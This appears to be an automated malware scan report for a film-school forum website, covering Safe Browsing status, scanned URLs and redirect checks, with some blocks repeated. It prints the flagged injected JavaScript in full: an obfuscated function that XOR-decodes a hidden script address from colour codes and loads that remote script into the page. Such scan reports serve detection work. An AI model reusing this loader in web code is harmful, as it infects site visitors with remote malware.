Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=filmschoolsforum.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://filmschoolsforum.com/ | 200 OK Content-Length: 76461 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vdch() { if(document.all.length > 3) { var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029'); var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } } var dch = document.createElement("script"); dch.id = "dchid"; dch.src = dchid; document.all[3].appendChild(dch); } else { setTimeout("vdch()",500); } } setTimeout("vdch()",500); Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://filmschoolsforum.com/feed:http://www.filmschoolsforum.com/?feed=rss2 | 404 Not Found Content-Length: 424 Content-Type: text/html | clean |
http://filmschoolsforum.com/test404page.js | 404 Not Found Content-Length: 401 Content-Type: text/html | clean |
http://filmschoolsforum.com/feed:http://www.filmschoolsforum.com/?feed=comments-rss2 | 404 Not Found Content-Length: 424 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: filmschoolsforum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 21:17:43 GMT
Server: Apache
Content-Type: text/html
Set-Cookie: kbtm23=402
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: filmschoolsforum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 21:17:43 GMT
Server: Apache
Content-Type: text/html
Set-Cookie: kbtm23=402
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: filmschoolsforum.com
Referer: http://www.google.com/search?q=filmschoolsforum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: filmschoolsforum.com
Referer: http://www.google.com/search?q=filmschoolsforum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.